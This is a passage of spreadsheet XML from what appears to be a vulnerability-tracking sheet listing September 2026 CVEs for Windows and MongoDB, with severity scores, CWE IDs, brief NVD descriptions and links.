      <c r="Q251" s="5" t="inlineStr"/>
      <c r="R251" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S251" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Remote Desktop Licensing Service allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T251" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68893</t>
        </is>
      </c>
    </row>
    <row r="252">
      <c r="A252" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B252" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C252" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69340</t>
        </is>
      </c>
      <c r="D252" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E252" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F252" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G252" s="5" t="inlineStr"/>
      <c r="H252" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I252" s="5" t="inlineStr"/>
      <c r="J252" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K2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2" s="5" t="inlineStr"/>
      <c r="M252" s="5" t="inlineStr"/>
      <c r="N252" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O252" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P252" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q252" s="5" t="inlineStr"/>
      <c r="R252" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-125</t>
        </is>
      </c>
      <c r="S252" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="T252" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69340</t>
        </is>
      </c>
    </row>
    <row r="253">
      <c r="A253" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B253" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C253" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69366</t>
        </is>
      </c>
      <c r="D253" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E253" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F253" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G253" s="5" t="inlineStr"/>
      <c r="H253" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I253" s="5" t="inlineStr"/>
      <c r="J253" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K2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3" s="5" t="inlineStr"/>
      <c r="M253" s="5" t="inlineStr"/>
      <c r="N253" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O253" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P253" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q253" s="5" t="inlineStr"/>
      <c r="R253" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S253" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Kernel allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T253" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69366</t>
        </is>
      </c>
    </row>
    <row r="254">
      <c r="A254" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B254" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C254" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69536</t>
        </is>
      </c>
      <c r="D254" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E254" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F254" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G254" s="5" t="inlineStr"/>
      <c r="H254" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I254" s="5" t="inlineStr"/>
      <c r="J254" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K254" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L254" s="5" t="inlineStr"/>
      <c r="M254" s="5" t="inlineStr"/>
      <c r="N254" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O254" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P254" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q254" s="5" t="inlineStr"/>
      <c r="R254" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S254" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Remote Desktop Services allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T254" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69536</t>
        </is>
      </c>
    </row>
    <row r="255">
      <c r="A255" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B255" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C255" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82052</t>
        </is>
      </c>
      <c r="D255" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E255" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F255" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G255" s="5" t="inlineStr"/>
      <c r="H255" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I255" s="5" t="inlineStr"/>
      <c r="J255" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K255" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L255" s="5" t="inlineStr"/>
      <c r="M255" s="5" t="inlineStr"/>
      <c r="N255" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O255" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P255" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q255" s="5" t="inlineStr"/>
      <c r="R255" s="5" t="inlineStr">
        <is>
          <t>CWE-617</t>
        </is>
      </c>
      <c r="S255"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T255" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82052</t>
        </is>
      </c>
    </row>
    <row r="256">
      <c r="A256" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B256" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C256" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82054</t>
        </is>
      </c>
      <c r="D256" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E256" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F256" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G256" s="5" t="inlineStr"/>
      <c r="H256" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I256" s="5" t="inlineStr"/>
      <c r="J256" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K256" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L256" s="5" t="inlineStr"/>
      <c r="M256" s="5" t="inlineStr"/>
      <c r="N256" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O256" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P256" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q256" s="5" t="inlineStr"/>
      <c r="R256" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="S256"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T256" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82054</t>
        </is>
      </c>
    </row>
    <row r="257">
      <c r="A257" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B257" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C257" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82055</t>
        </is>
      </c>
      <c r="D257" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E257" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F257" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G257" s="5" t="inlineStr"/>
      <c r="H257" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I257" s="5" t="inlineStr"/>
      <c r="J257" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K257" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L257" s="5" t="inlineStr"/>
      <c r="M257" s="5" t="inlineStr"/>
      <c r="N257" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O257" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P257" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q257" s="5" t="inlineStr"/>
      <c r="R257" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="S257"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T257" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82055</t>
        </is>
      </c>
    </row>
    <row r="258">
      <c r="A258" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B258" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C258" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82057</t>
        </is>
      </c>
      <c r="D258" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E258" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F258" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G258" s="5" t="inlineStr"/>
      <c r="H258" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I258" s="5" t="inlineStr"/>
      <c r="J258" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K258" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L258" s="5" t="inlineStr"/>
      <c r="M258" s="5" t="inlineStr"/>
      <c r="N258" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O258" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P258" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q258" s="5" t="inlineStr"/>
      <c r="R258" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="S258"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T258" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82057</t>
        </is>
      </c>
    </row>
    <row r="259">
      <c r="A259" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B259" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C259" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82058</t>
        </is>
      </c>
      <c r="D259" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E259" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F259" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G259" s="5" t="inlineStr"/>
      <c r="H259" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I259" s="5" t="inlineStr"/>
      <c r="J259" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K259" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L259" s="5" t="inlineStr"/>
      <c r="M259" s="5" t="inlineStr"/>
      <c r="N259" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O259" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P259" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q259" s="5" t="inlineStr"/>
      <c r="R259" s="5" t="inlineStr">
        <is>
          <t>CWE-248</t>
        </is>
      </c>
      <c r="S259"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T259" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82058</t>
        </is>
      </c>
    </row>
    <row r="260">
      <c r="A260" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B260" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C260" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82065</t>
        </is>
      </c>
      <c r="D260" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E260" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F260" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G260" s="5" t="inlineStr"/>
      <c r="H260" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I260" s="5" t="inlineStr"/>
      <c r="J260" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K260" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L260" s="5" t="inlineStr"/>
      <c r="M260" s="5" t="inlineStr"/>
      <c r="N260" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O260" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P260" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q260" s="5" t="inlineStr"/>
      <c r="R260" s="5" t="inlineStr">
        <is>
          <t>CWE-617</t>
        </is>
      </c>
      <c r="S260"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T260" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82065</t>
        </is>
      </c>
    </row>
    <row r="261">
      <c r="A261" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B261" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C261" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82068</t>
        </is>
      </c>
      <c r="D261" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E261" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F261" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G261" s="5" t="inlineStr"/>
      <c r="H261" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I261" s="5" t="inlineStr"/>
      <c r="J261" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K261" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L261" s="5" t="inlineStr"/>
      <c r="M261" s="5" t="inlineStr"/>
      <c r="N261" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O261" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P261" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q261" s="5" t="inlineStr"/>
      <c r="R261" s="5" t="inlineStr">
        <is>
          <t>CWE-617</t>
        </is>
      </c>
      <c r="S261"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T261" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82068</t>
        </is>
      </c>
    </row>
    <row r="262">
      <c r="A262" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B262" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C262" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82070</t>
        </is>
      </c>
      <c r="D262" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E262" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F262" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G262" s="5" t="inlineStr"/>
      <c r="H262" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I262" s="5" t="inlineStr"/>
      <c r="J262" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K262" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L262" s="5" t="inlineStr"/>
      <c r="M262" s="5" t="inlineStr"/>
      <c r="N262" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O262" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P262" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q262" s="5" t="inlineStr"/>
      <c r="R262" s="5" t="inlineStr">
        <is>
          <t>CWE-522</t>
        </is>
      </c>
      <c r="S262"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T262" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82070</t>
        </is>
      </c>
    </row>
    <row r="263">
      <c r="A263" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B263" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C263" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82073</t>
        </is>
      </c>
      <c r="D263" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E263" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F263" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G263" s="5" t="inlineStr"/>
      <c r="H263" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I263" s="5" t="inlineStr"/>
      <c r="J263" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K263" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L263" s="5" t="inlineStr"/>
      <c r="M263" s="5" t="inlineStr"/>
      <c r="N263" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O263" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P263" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q263" s="5" t="inlineStr"/>
      <c r="R263" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S263"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T263" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82073</t>
        </is>
      </c>
    </row>
    <row r="264">
      <c r="A264" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B264" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C264" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82074</t>
        </is>
      </c>
      <c r="D264" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E264" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F264" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G264" s="5" t="inlineStr"/>
      <c r="H264" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I264" s="5" t="inlineStr"/>
      <c r="J264" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K264" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L264" s="5" t="inlineStr"/>
      <c r="M264" s="5" t="inlineStr"/>
      <c r="N264" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O264" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P264" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q264" s="5" t="inlineStr"/>
      <c r="R264" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S264"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T264" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82074</t>
        </is>
      </c>
    </row>
    <row r="265">
      <c r="A265" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B265" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C265" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82076</t>
        </is>
      </c>
      <c r="D265" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E265" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F265" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G265" s="5" t="inlineStr"/>
      <c r="H265" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I265" s="5" t="inlineStr"/>
      <c r="J265" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K265" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L265" s="5" t="inlineStr"/>
      <c r="M265" s="5" t="inlineStr"/>
      <c r="N265" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O265" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P265" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q265" s="5" t="inlineStr"/>
      <c r="R265" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="S265"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T265" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82076</t>
        </is>
      </c>
    </row>
    <row r="266">
      <c r="A266" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B266" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C266" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68840</t>
        </is>
      </c>
      <c r="D266" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E266" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F266" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G266" s="5" t="inlineStr"/>
      <c r="H266" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I266" s="5" t="inlineStr"/>
      <c r="J266" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K2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66" s="5" t="inlineStr"/>
      <c r="M266" s="5" t="inlineStr"/>
      <c r="N266" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O266" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P266" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q266" s="5" t="inlineStr"/>
      <c r="R266" s="5" t="inlineStr">
        <is>
          <t>CWE-362, CWE-416</t>
        </is>
      </c>
      <c r="S266" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows USB Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T266" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68840</t>
        </is>
      </c>
    </row>
    <row r="267">
      <c r="A267" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B267" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C267" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68884</t>
        </is>
      </c>
      <c r="D267" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E267" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F267" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G267" s="5" t="inlineStr"/>
      <c r="H267" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I267" s="5" t="inlineStr"/>
      <c r="J267" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K26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67" s="5" t="inlineStr"/>
      <c r="M267" s="5" t="inlineStr"/>
      <c r="N267" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O267" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P267" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q267" s="5" t="inlineStr"/>
      <c r="R267" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S267" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Kernel allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T267" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68884</t>
        </is>
      </c>
    </row>
    <row r="268">
      <c r="A268" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B268" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C268" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69287</t>
        </is>
      </c>
      <c r="D268" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E268" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F268" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G268" s="5" t="inlineStr"/>
      <c r="H268" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I268" s="5" t="inlineStr"/>
      <c r="J268" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K2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68" s="5" t="inlineStr"/>
      <c r="M268" s="5" t="inlineStr"/>
      <c r="N268" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O268" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P268" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q268" s="5" t="inlineStr"/>
      <c r="R268" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S268" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Remote Desktop Services allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T268" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69287</t>
        </is>
      </c>
    </row>
    <row r="269">
      <c r="A269" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B269" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C269" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69319</t>
        </is>
      </c>
      <c r="D269" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E269" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F269" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G269" s="5" t="inlineStr"/>
      <c r="H269" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I269" s="5" t="inlineStr"/>
      <c r="J269" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K2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69" s="5" t="inlineStr"/>
      <c r="M269" s="5" t="inlineStr"/>
      <c r="N269" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O269" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
